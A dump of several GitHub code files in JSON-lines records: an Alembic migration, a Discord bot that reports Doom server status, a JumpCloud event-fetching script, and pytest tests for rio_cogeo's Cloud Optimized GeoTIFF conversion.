sa.Integer(), nullable=True),\n sa.Column('tipologia_id', sa.Integer(), nullable=True),\n sa.Column('allineamento_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['allineamento_id'], ['allineamenti.id'], ),\n sa.ForeignKeyConstraint(['tipologia_id'], ['tipologie.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('nome')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('personaggi')\n op.drop_table('tipologie')\n op.drop_table('allineamenti')\n # ### end Alembic commands ###\n","repo_name":"lucamarino07/lupus_project","sub_path":"migrations/versions/29d15d666661_qq.py","file_name":"29d15d666661_qq.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44296270451","text":"import sys\nimport os\nimport subprocess\nimport threading\nimport time\nimport asyncio\nimport datetime\nimport random\nimport pyinotify\n\nimport discord\n\nfrom doom_monitor import T_DoomMonitor\nfrom collections import deque\n\nOWNER_ID = ''\nBOT_TOKEN = ''\n\ndef command(admin_only=False, **m_kwargs):\n def wrap(func):\n async def deco(bot, message, *args, **kwargs):\n if deco.admin_only and not message.author.server_permissions.administrator:\n chk1 = not message.author.server_permissions.administrator\n chk2 = not message.author.id == OWNER_ID\n if chk1 and chk2:\n return\n if message.channel.is_private:\n return\n\n await func(bot, message, *args, **kwargs)\n\n setattr(deco, 'admin_only', admin_only)\n\n for k in m_kwargs:\n setattr(deco, k, m_kwargs[k])\n\n return deco\n return wrap\n\n@command()\nasync def help(bot, message, **kwargs):\n cmds = 'USER COMMANDS:\\n'\n cmds_admin = '\\nADMIN COMMANDS:\\n'\n for cmd in bot.commands:\n w = ''\n try:\n h = getattr(bot.commands[cmd], 'help_str')\n except:\n h = ''\n if bot.commands[cmd].admin_only:\n cmds_admin += (bot.command_prefix + cmd + ' ' + h + w + '\\n')\n else:\n cmds += (bot.command_prefix + cmd + ' ' + h + w + '\\n')\n await bot.send_message(message.channel, '```' + cmds + cmds_admin + '```')\n\n@command(admin_only=True, allow_whitelist=False, help_str='<single char>')\nasync def prefix(bot, message, split_text=[''], **kwargs):\n try:\n if len(split_text[1]) > 1:\n raise IndexError\n bot.command_prefix = split_text[1]\n except IndexError:\n await bot.send_message(message.channel, 'Invalid arguments. Proper usage: {}prefix <single char>'.format(bot.command_prefix))\n except ValueError:\n await bot.send_message(message.channel, 'Invalid arguments. Choose a different character')\n else:\n await bot.send_message(message.channel, 'Bot command prefix changed to {}'.format(bot.command_prefix))\n\n@command()\nasync def doom(bot, message, **kwargs):\n if len(bot.reader.players) < 1:\n pnames = 'No players connected.'\n else:\n pnames = 'Players connected: ' + ', '.join([pname for pname in bot.reader.players])\n\n with open('./config/hostname.cfg', 'r') as f:\n line = f.readline()\n server_info = line[line.find(' ')+2:-2]\n\n s = '**{0}** `{1}`\\n{2}'.format(bot.server_ip, server_info, pnames)\n await bot.send_message(message.channel, s)\n\nclass DoomBot(discord.Client):\n\n def __init__(self, owner_id, bot_token):\n super().__init__(max_messages=100)\n\n self.owner = owner_id\n self.token = bot_token\n\n self.command_prefix = '!'\n\n self.commands = {}\n self.commands['help'] = help\n self.commands['prefix'] = prefix\n self.commands['doom'] = doom\n\n self.server_ip = '127.0.0.1:10666'\n self.doom_channel_id = ''\n self.doom_channel = discord.Object(id=self.doom_channel_id)\n self.reader = None\n\n def run(self):\n super().run(self.token)\n\n self.loop.create_task(self.listen_for_server())\n\n async def on_ready(self):\n print('Bot logged in successfully. 
' + datetime.datetime.now().strftime(\"%H:%M %m-%d-%Y\"))\n print(self.user.name)\n print(self.user.id)\n\n async def on_message(self, message):\n if message.content and message.content[0] == self.command_prefix:\n content = message.content.split(' ')\n if content[0][1:] in self.commands:\n await self.commands[content[0][1:]](self, message, split_text=content)\n\n def get_logger_pid(self):\n proc = subprocess.Popen('./utils/get_logger_pid.sh',\n stdout=subprocess.PIPE)\n\n out, _ = proc.communicate(timeout=5)\n PID = out.decode('ascii').strip()\n if proc.poll() is None:\n proc.kill()\n\n if PID.isspace() or not PID.isdigit():\n return None\n else:\n return PID\n\n async def listen_for_server(self, wait_time=10):\n PID = self.get_logger_pid()\n while not PID:\n await asyncio.sleep(wait_time)\n PID = self.get_logger_pid()\n\n if self.reader is None:\n self.loop.create_task(self.monitor_server(PID))\n\n async def monitor_server(PID, wait_time=1):\n cmd = ['tail', '-f', '-n', '1', '--pid={}'.format(PID), '/proc/{}/fd/1'.format(PID)]\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n\n out_q = deque()\n self.reader = T_DoomMonitor(proc.stdout, out_q, interval=wait_time)\n self.reader.start()\n\n try:\n while not self.reader.eof():\n while out_q:\n line = out_q.popleft()\n if self.doom_channel.id != '':\n await self.send_message(self.doom_channel, line)\n\n if not proc.poll() is None and self.reader.is_alive():\n self.reader.stop_monitoring()\n\n await asyncio.sleep(wait_time)\n finally:\n if self.reader.is_alive() and not self.reader.abort:\n self.reader.stop_monitoring()\n\n self.reader.join()\n proc.stdout.close()\n if proc.poll() is None:\n proc.kill()\n\n self.reader = None\n self.loop.create_task(self.listen_for_server())\n\nif __name__ == '__main__':\n cl = DoomBot(OWNER_ID, BOT_TOKEN)\n\n cl.run()\n","repo_name":"mzaneski/doom-stuff","sub_path":"doombot.py","file_name":"doombot.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11335001141","text":"import requests\nimport datetime\nimport os\n\nurl = \"https://events.jumpcloud.com/events\"\n\ndt = datetime.datetime.today()\ndt2 =dt - datetime.timedelta(days=7)\n\nend= \"{0:%Y-%m-%dT%H:%M:%SZ}\".format(dt)\nstart=\"{0:%Y-%m-%dT%H:%M:%SZ}\".format(dt2)\n\npayload = 'startDate=' + start + '&' + 'endDate' +end\nheaders = {\n 'x-api-key': os.environ[\"JCAPI\"],\n 'content-type': \"application/json\",\n }\n\nresponse = requests.request(\"GET\", url, params=payload, headers=headers)\n\nprint(response.text)\n","repo_name":"samuraidays/jumpcloud-events-get","sub_path":"jumpcloud_events.py","file_name":"jumpcloud_events.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73129459208","text":"\"\"\"tests rio_cogeo.cogeo.\"\"\"\n\nimport os\nimport pathlib\n\nimport numpy\nimport pytest\nimport rasterio\nfrom rasterio.enums import ColorInterp\nfrom rasterio.io import MemoryFile\nfrom rasterio.shutil import copy\nfrom rasterio.vrt import WarpedVRT\n\nfrom rio_cogeo.cogeo import TemporaryRasterFile, cog_info, cog_translate, cog_validate\nfrom rio_cogeo.errors import IncompatibleOptions\nfrom rio_cogeo.profiles import cog_profiles\nfrom rio_cogeo.utils import has_alpha_band, has_mask_band\n\nfrom .conftest import requires_gdal31, requires_webp\n\nFIXTURES_DIR = os.path.join(os.path.dirname(__file__), \"fixtures\")\nraster_path_rgba = 
os.path.join(FIXTURES_DIR, \"image_rgba.tif\")\nraster_path_rgb = os.path.join(FIXTURES_DIR, \"image_rgb.tif\")\nraster_path_nan = os.path.join(FIXTURES_DIR, \"image_nan.tif\")\nraster_path_nodata = os.path.join(FIXTURES_DIR, \"image_nodata.tif\")\nraster_path_float = os.path.join(FIXTURES_DIR, \"image_float.tif\")\nraster_path_missingnodata = os.path.join(FIXTURES_DIR, \"image_missing_nodata.tif\")\nraster_path_tags = os.path.join(FIXTURES_DIR, \"image_tags.tif\")\nraster_path_mask = os.path.join(FIXTURES_DIR, \"image_rgb_mask.tif\")\nraster_path_small = os.path.join(FIXTURES_DIR, \"image_171px.tif\")\nraster_path_toosmall = os.path.join(FIXTURES_DIR, \"image_51px.tif\")\nraster_path_offsets = os.path.join(FIXTURES_DIR, \"image_with_offsets.tif\")\nraster_colormap = os.path.join(FIXTURES_DIR, \"image_colormap.tif\")\nraster_nocolormap = os.path.join(FIXTURES_DIR, \"image_nocolormap.tif\")\nraster_badoutputsize = os.path.join(FIXTURES_DIR, \"bad_output_vrt.tif\")\nraster_web_z5_z11 = os.path.join(FIXTURES_DIR, \"image_web_z5_z11.tif\")\nraster_band_tags = os.path.join(FIXTURES_DIR, \"cog_band_tags.tif\")\nraster_ns_meta = os.path.join(FIXTURES_DIR, \"dataset_namespace_metadata.tif\")\n\njpeg_profile = cog_profiles.get(\"jpeg\")\njpeg_profile.update({\"blockxsize\": 64, \"blockysize\": 64})\nwebp_profile = cog_profiles.get(\"webp\")\nwebp_profile.update({\"blockxsize\": 64, \"blockysize\": 64})\ndeflate_profile = cog_profiles.get(\"deflate\")\ndeflate_profile.update({\"blockxsize\": 64, \"blockysize\": 64})\nraw_profile = cog_profiles.get(\"raw\")\nraw_profile.update({\"blockxsize\": 64, \"blockysize\": 64})\ndefault_profile = cog_profiles.get(\"raw\")\n\n\n@pytest.fixture(autouse=True)\ndef testing_env_var(monkeypatch):\n \"\"\"Set GDAL env.\"\"\"\n monkeypatch.setenv(\"GDAL_DISABLE_READDIR_ON_OPEN\", \"TRUE\")\n monkeypatch.setenv(\"GDAL_TIFF_INTERNAL_MASK\", \"TRUE\")\n monkeypatch.setenv(\"GDAL_TIFF_OVR_BLOCKSIZE\", \"64\")\n\n\ndef _validate_translated_rgb_jpeg(src):\n assert src.height == 512\n assert src.width == 512\n assert src.meta[\"dtype\"] == \"uint8\"\n assert src.is_tiled\n assert src.profile[\"blockxsize\"] == 64\n assert src.profile[\"blockysize\"] == 64\n assert src.compression.value == \"JPEG\"\n assert src.photometric.value == \"YCbCr\"\n assert src.interleaving.value == \"PIXEL\"\n assert src.overviews(1) == [2, 4, 8]\n assert src.tags()[\"OVR_RESAMPLING_ALG\"] == \"NEAREST\"\n assert not has_mask_band(src)\n\n\ndef test_cog_translate_valid(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_rgb, \"cogeo.tif\", jpeg_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", jpeg_profile, add_mask=True, quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert has_mask_band(src)\n with rasterio.open(\"cogeo.tif\", OVERVIEW_LEVEL=1) as src:\n assert src.block_shapes[0] == (64, 64)\n with rasterio.open(raster_path_rgb) as src:\n with rasterio.open(\"cogeo.tif\") as dst:\n assert src.colorinterp == dst.colorinterp\n\n\ndef test_cog_translate_NodataLossyWarning(runner):\n \"\"\"Should work as expected (create cogeo file but warns about mask creation).\"\"\"\n with runner.isolated_filesystem():\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", jpeg_profile, nodata=0, quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert not src.nodata\n assert 
src.compression.value == \"JPEG\"\n assert has_mask_band(src)\n\n\ndef test_cog_translate_NodataMask(runner):\n \"\"\"Should work as expected (create cogeo and translate nodata to mask).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(\n raster_path_missingnodata,\n \"cogeo.tif\",\n deflate_profile,\n nodata=-9999,\n add_mask=True,\n quiet=True,\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.nodata is None\n assert has_mask_band(src)\n assert not src.dataset_mask().all()\n\n\ndef test_cog_translate_validRaw(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_rgb, \"cogeo.tif\", raw_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.height == 512\n assert src.width == 512\n assert src.is_tiled\n assert not src.compression\n assert src.interleaving.value == \"PIXEL\"\n\n\ndef test_cog_translate_validIndexes(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_rgb, \"cogeo.tif\", raw_profile, indexes=1, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 1\n\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", raw_profile, indexes=[1], quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 1\n\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", raw_profile, indexes=(1,), quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 1\n\n\n@requires_webp\ndef test_cog_translate_validAlpha(runner):\n \"\"\"Should work as expected (create cogeo file with alpha band).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_rgba, \"cogeo.tif\", webp_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.height == 512\n assert src.width == 512\n assert src.meta[\"dtype\"] == \"uint8\"\n assert src.is_tiled\n assert src.compression.value == \"WEBP\"\n assert has_alpha_band(src)\n\n with rasterio.open(raster_path_rgba) as src:\n with rasterio.open(\"cogeo.tif\") as dst:\n assert src.colorinterp == dst.colorinterp\n\n with pytest.warns(UserWarning):\n cog_translate(raster_path_rgba, \"cogeo.tif\", jpeg_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 3\n\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgba,\n \"cogeo.tif\",\n jpeg_profile,\n indexes=(1, 2, 3, 4),\n quiet=True,\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 3\n assert src.compression.value == \"JPEG\"\n assert has_mask_band(src)\n\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgba, \"cogeo.tif\", jpeg_profile, indexes=(1,), quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.count == 1\n assert src.compression.value == \"JPEG\"\n assert has_mask_band(src)\n\n\ndef test_cog_translate_valiNodataNan(runner):\n \"\"\"Should work as expected and create mask from NaN.\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_nan, \"cogeo_nan.tif\", raw_profile, quiet=True)\n with rasterio.open(\"cogeo_nan.tif\") as src:\n assert src.meta[\"dtype\"] == \"float64\"\n assert src.nodata\n assert not src.dataset_mask().all()\n\n cog_translate(\n raster_path_float,\n \"cogeo_nan.tif\",\n raw_profile,\n nodata=numpy.nan,\n quiet=True,\n )\n with rasterio.open(\"cogeo_nan.tif\") as src:\n assert src.meta[\"dtype\"] == \"float64\"\n assert src.nodata\n assert not src.dataset_mask().all()\n\n\ndef 
test_cog_translate_validOverviews(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", jpeg_profile, overview_level=2, quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.overviews(1) == [2, 4]\n\n\ndef test_cog_translate_valiEnv(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n config = {\"GDAL_TIFF_INTERNAL_MASK\": False}\n cog_translate(\n raster_path_rgba,\n \"cogeo_env.tif\",\n jpeg_profile,\n indexes=[1, 2, 3],\n add_mask=True,\n config=config,\n quiet=True,\n )\n with rasterio.open(\"cogeo_env.tif\") as src:\n assert \"cogeo_env.tif.msk\" in src.files\n\n\ndef test_cog_translate_validCustom(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n config = {\"GDAL_TIFF_OVR_BLOCKSIZE\": 256}\n profile = jpeg_profile.copy()\n profile.update({\"blockxsize\": 256, \"blockysize\": 256})\n cog_translate(\n raster_path_rgb, \"cogeo_env.tif\", profile, config=config, quiet=True\n )\n with rasterio.open(\"cogeo_env.tif\") as src:\n assert src.height == 512\n assert src.width == 512\n assert src.meta[\"dtype\"] == \"uint8\"\n assert src.is_tiled\n assert src.compression.value == \"JPEG\"\n assert src.profile[\"blockxsize\"] == 256\n assert src.profile[\"blockysize\"] == 256\n assert src.photometric.value == \"YCbCr\"\n assert src.interleaving.value == \"PIXEL\"\n assert src.overviews(1) == [2]\n\n\ndef test_cog_translate_mask(runner):\n \"\"\"Should work as expected (copy mask from input).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_mask, \"cogeo.tif\", jpeg_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert has_mask_band(src)\n\n\ndef test_cog_translate_tags(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n cog_translate(raster_path_tags, \"cogeo.tif\", jpeg_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.tags()[\"OVR_RESAMPLING_ALG\"] == \"NEAREST\"\n assert src.tags()[\"DatasetName\"] == \"my useful dataset\"\n assert src.descriptions[0] == \"first band\"\n assert src.descriptions[1] == \"second band\"\n assert src.descriptions[2] == \"third band\"\n\n cog_translate(\n raster_path_tags,\n \"cogeo.tif\",\n jpeg_profile,\n quiet=True,\n additional_cog_metadata={\"comment\": \"it should work\"},\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.tags()[\"OVR_RESAMPLING_ALG\"] == \"NEAREST\"\n assert src.tags()[\"comment\"] == \"it should work\"\n\n cog_translate(\n raster_path_tags, \"cogeo.tif\", raw_profile, indexes=[2], quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.tags()[\"OVR_RESAMPLING_ALG\"] == \"NEAREST\"\n assert src.tags()[\"DatasetName\"] == \"my useful dataset\"\n assert src.descriptions[0] == \"second band\"\n\n\ndef test_cog_translate_valid_blocksize(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n d = default_profile.copy()\n d.update({\"blockxsize\": 128, \"blockysize\": 128})\n cog_translate(raster_path_small, \"cogeo.tif\", d, quiet=True)\n assert cog_validate(\"cogeo.tif\")\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.height == 171\n assert src.width == 171\n assert src.is_tiled\n assert src.profile[\"blockxsize\"] == 128\n assert src.profile[\"blockysize\"] == 128\n assert src.overviews(1) == [2]\n\n 
cog_translate(raster_path_toosmall, \"cogeo.tif\", default_profile, quiet=True)\n assert cog_validate(\"cogeo.tif\")\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.height == 51\n assert src.width == 51\n assert src.is_tiled\n assert src.profile.get(\"blockxsize\") == 512\n assert src.profile.get(\"blockysize\") == 512\n assert not src.overviews(1)\n\n\ndef test_cog_translate_dataset(runner):\n \"\"\"Should work as expected (create cogeo from an open dataset).\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as src_dst:\n cog_translate(src_dst, \"cogeo.tif\", jpeg_profile, quiet=True)\n assert not src_dst.closed\n\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n\n\ndef test_cog_translate_memfile(runner):\n \"\"\"Should work as expected (create cogeo from an open memfile).\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as dataset:\n data = dataset.read()\n with MemoryFile() as memfile:\n with memfile.open(**dataset.profile) as mem:\n mem.write(data)\n cog_translate(mem, \"cogeo.tif\", jpeg_profile, quiet=True)\n\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n\n\ndef test_cog_translate_to_memfile(runner):\n \"\"\"Create COG in memory and using in memory or in disk temp files.\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as dataset:\n with MemoryFile() as memfile:\n cog_translate(dataset, memfile.name, deflate_profile, quiet=True)\n with memfile.open() as src:\n assert src.width == dataset.width\n\n with rasterio.open(raster_path_rgb) as dataset:\n with MemoryFile() as memfile:\n cog_translate(\n dataset, memfile.name, deflate_profile, in_memory=False, quiet=True\n )\n with memfile.open() as src:\n assert src.width == dataset.width\n\n\ndef test_cog_translate_warpedvrt(runner):\n \"\"\"Should work as expected (create cogeo from an open memfile).\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as dataset:\n with WarpedVRT(dataset) as vrt:\n cog_translate(vrt, \"cogeo.tif\", jpeg_profile, quiet=True)\n\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n\n\ndef test_cog_translate_forward_tags(runner):\n \"\"\"Should work as expected (create cogeo from an open memfile).\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_rgb) as dataset:\n data = dataset.read()\n with MemoryFile() as memfile:\n with memfile.open(**dataset.profile) as mem:\n mem.write(data)\n mem.update_tags(1, jqt=\"dre\")\n cog_translate(\n mem,\n \"cogeo.tif\",\n jpeg_profile,\n forward_band_tags=True,\n quiet=True,\n )\n\n with rasterio.open(\"cogeo.tif\") as src:\n _validate_translated_rgb_jpeg(src)\n assert src.tags(1) == {\"jqt\": \"dre\"}\n\n\ndef test_cog_translate_oneBandJpeg(runner):\n \"\"\"Should work as expected (create cogeo file).\"\"\"\n with runner.isolated_filesystem():\n profile = jpeg_profile.copy()\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgb, \"cogeo.tif\", profile, indexes=(1,), quiet=True\n )\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.compression.value == \"JPEG\"\n assert src.colorinterp[0] == rasterio.enums.ColorInterp.gray\n\n\ndef test_cog_translate_forward_scales(runner):\n \"\"\"Scales and Offset should be passed to the output file.\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_path_offsets) as dataset:\n offs = dataset.offsets\n scls = dataset.scales\n cog_translate(\n 
dataset,\n \"cogeo.tif\",\n deflate_profile,\n forward_band_tags=True,\n quiet=True,\n )\n\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.scales == scls\n assert src.offsets == offs\n\n\ndef test_cog_translate_forward_cmap(runner):\n \"\"\"Colormap should be passed to the output file.\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_colormap) as dataset:\n cog_translate(dataset, \"cogeo.tif\", deflate_profile, quiet=True)\n\n with rasterio.open(\"cogeo.tif\") as cog:\n assert cog.colormap(1) == dataset.colormap(1)\n assert cog.colorinterp == dataset.colorinterp\n\n # add an external colormap\n cmap = {0: (0, 0, 0, 0), 1: (1, 2, 3, 255)}\n with rasterio.open(raster_nocolormap) as dataset:\n cog_translate(\n dataset, \"cogeo.tif\", deflate_profile, quiet=True, colormap=cmap\n )\n with rasterio.open(\"cogeo.tif\") as cog:\n assert cog.colormap(1)[1] == cmap[1]\n assert cog.colorinterp == (ColorInterp.palette,)\n\n with pytest.raises(IncompatibleOptions):\n with rasterio.open(raster_nocolormap) as dataset:\n cog_translate(\n dataset,\n \"cogeo.tif\",\n deflate_profile,\n quiet=True,\n colormap=cmap,\n indexes=(1, 1, 1),\n )\n\n # add an external colormap (warns of wrong colorinterp)\n with pytest.warns(UserWarning):\n with rasterio.open(raster_path_rgb) as dataset:\n cog_translate(\n dataset,\n \"cogeo.tif\",\n deflate_profile,\n quiet=True,\n colormap=cmap,\n indexes=(1,),\n )\n with rasterio.open(\"cogeo.tif\") as cog:\n assert cog.colormap(1)[1] == cmap[1]\n assert cog.colorinterp == (ColorInterp.palette,)\n assert not cog.colorinterp[0] == dataset.colorinterp[0]\n\n # Input dataset has colorinterp set to `Palette` but no colormap\n with pytest.warns(UserWarning):\n with rasterio.open(raster_nocolormap) as dataset:\n cog_translate(dataset, \"cogeo.tif\", deflate_profile, quiet=True)\n with rasterio.open(\"cogeo.tif\") as cog:\n assert cog.colorinterp == dataset.colorinterp\n\n\ndef test_output_size(runner):\n \"\"\"Validate fix for #140.\"\"\"\n with runner.isolated_filesystem():\n with rasterio.open(raster_badoutputsize) as src_dst:\n with MemoryFile() as memfile:\n cog_translate(src_dst, memfile.name, deflate_profile, quiet=True)\n with memfile.open() as dataset:\n assert src_dst.width == dataset.width\n assert src_dst.height == dataset.height\n\n\ndef test_cog_info():\n \"\"\"Test COGEO info.\"\"\"\n info = cog_info(raster_web_z5_z11)\n assert info.COG\n assert info.GEO.CRS == \"EPSG:3857\"\n assert info.GEO.MinZoom == 5\n assert info.GEO.MaxZoom == 11\n assert len(info.IFD) == 6\n assert info.Tags[\"Image Metadata\"]\n assert info.Tags[\"Image Structure\"]\n\n\ndef test_cog_info_dict_access():\n \"\"\"Test dictionary access to COGEO info.\"\"\"\n info = cog_info(raster_web_z5_z11)\n assert info[\"COG\"]\n assert info[\"GEO\"][\"CRS\"] == \"EPSG:3857\"\n assert info[\"GEO\"][\"MinZoom\"] == 5\n assert info[\"GEO\"][\"MaxZoom\"] == 11\n assert len(info[\"IFD\"]) == 6\n assert info[\"Tags\"][\"Image Metadata\"]\n assert info[\"Tags\"][\"Image Structure\"]\n\n\n@pytest.mark.parametrize(\n \"fname,is_local\",\n [\n (\n raster_path_rgba,\n True,\n ),\n (pathlib.Path(raster_path_rgba), True),\n (\"s3://abucket/adirectory/afile.tif\", False),\n (\"https://ahost/adirectory/afile.tif\", False),\n ],\n)\ndef test_temporaryRaster(fname, is_local, runner):\n \"\"\"Test TemporaryRasterFile class with vsi and pathlib.\"\"\"\n with runner.isolated_filesystem() as iso:\n with TemporaryRasterFile(fname) as f:\n assert (\n pathlib.Path(fname).parent == 
pathlib.Path(f.name).parent\n ) == is_local\n assert (pathlib.Path(iso).parent == pathlib.Path(f.name).parent) != is_local\n pass\n assert not os.path.exists(f.name)\n\n\n@requires_gdal31\n@pytest.mark.parametrize(\n \"src_path\",\n [\n raster_path_rgba,\n raster_path_rgb,\n raster_path_nan,\n raster_path_nodata,\n raster_path_float,\n ],\n)\ndef test_gdal_cog(src_path, runner):\n \"\"\"Test GDAL COG.\"\"\"\n with runner.isolated_filesystem():\n cog_translate(\n src_path,\n \"cogeo.tif\",\n cog_profiles.get(\"raw\"),\n quiet=True,\n use_cog_driver=True,\n )\n assert cog_validate(\"cogeo.tif\")\n\n\n@requires_gdal31\ndef test_gdal_cog_compare(runner):\n \"\"\"Test GDAL COG.\"\"\"\n with runner.isolated_filesystem():\n profile = cog_profiles.get(\"jpeg\")\n profile[\"blockxsize\"] = 256\n profile[\"blockysize\"] = 256\n\n # rio cogeo GDAL COG\n cog_translate(\n raster_path_rgba,\n \"gdalcogeo.tif\",\n profile.copy(),\n quiet=True,\n use_cog_driver=True,\n )\n\n # pure COG\n copy(raster_path_rgba, \"cog.tif\", driver=\"COG\", blocksize=256, compress=\"JPEG\")\n\n # rio cogeo cog\n cog_translate(\n raster_path_rgba,\n \"riocogeo.tif\",\n profile.copy(),\n indexes=(\n 1,\n 2,\n 3,\n ),\n add_mask=True,\n quiet=True,\n )\n\n with rasterio.open(\"riocogeo.tif\") as riocogeo, rasterio.open(\n \"gdalcogeo.tif\"\n ) as gdalcogeo, rasterio.open(\"cog.tif\") as cog:\n assert cog.profile == gdalcogeo.profile == riocogeo.profile\n assert cog.overviews(1) == gdalcogeo.overviews(1) == riocogeo.overviews(1)\n\n\n@requires_gdal31\ndef test_gdal_cog_compareWeb(runner):\n \"\"\"Test GDAL COG.\"\"\"\n with runner.isolated_filesystem():\n profile = cog_profiles.get(\"jpeg\")\n profile[\"blockxsize\"] = 256\n profile[\"blockysize\"] = 256\n\n # rio cogeo GDAL COG\n cog_translate(\n raster_path_rgba,\n \"gdalcogeo.tif\",\n profile.copy(),\n quiet=True,\n use_cog_driver=True,\n web_optimized=True,\n aligned_levels=1,\n )\n\n # pure COG\n copy(\n raster_path_rgba,\n \"cog.tif\",\n driver=\"COG\",\n blocksize=256,\n compress=\"JPEG\",\n TILING_SCHEME=\"GoogleMapsCompatible\",\n TILING_SCHEME_ALIGNED_LEVELS=\"2\",\n )\n\n with rasterio.open(\"gdalcogeo.tif\") as gdalcogeo, rasterio.open(\n \"cog.tif\"\n ) as cog:\n cog_meta = cog.meta\n _ = cog_meta.pop(\"transform\")\n\n gdal_meta = gdalcogeo.meta\n _ = gdal_meta.pop(\"transform\")\n\n assert cog_meta == gdal_meta\n # there are sub-centimeter difference in the affine transform so we round\n # the bounds\n for xc, yc in zip(cog.bounds, gdalcogeo.bounds):\n assert round(xc, 5) == round(yc, 5)\n\n\n@requires_gdal31\ndef test_gdal_cog_web_mask(runner):\n \"\"\"Raise a warning for specific mask/compression/web combination.\"\"\"\n with runner.isolated_filesystem():\n with pytest.warns(UserWarning):\n cog_translate(\n raster_path_rgb,\n \"cogeo.tif\",\n cog_profiles.get(\"deflate\"),\n use_cog_driver=True,\n web_optimized=True,\n add_mask=True,\n quiet=True,\n )\n assert cog_validate(\"cogeo.tif\")\n\n\ndef test_info_with_metadata():\n \"\"\"Make sure info returns band metadata.\"\"\"\n info = cog_info(raster_band_tags)\n assert info.Band_Metadata\n assert info.model_dump(by_alias=True)[\"Band Metadata\"]\n assert info.Band_Metadata[\"Band 1\"].Description == \"Green\"\n assert info.Band_Metadata[\"Band 1\"].Metadata\n\n\ndef test_cog_translate_forward_ns_metadata(runner):\n \"\"\"Forward namespace metadata.\"\"\"\n with runner.isolated_filesystem():\n cog_translate(\n raster_ns_meta,\n \"cogeo.tif\",\n deflate_profile,\n config={\"GDAL_DISABLE_READDIR_ON_OPEN\": 
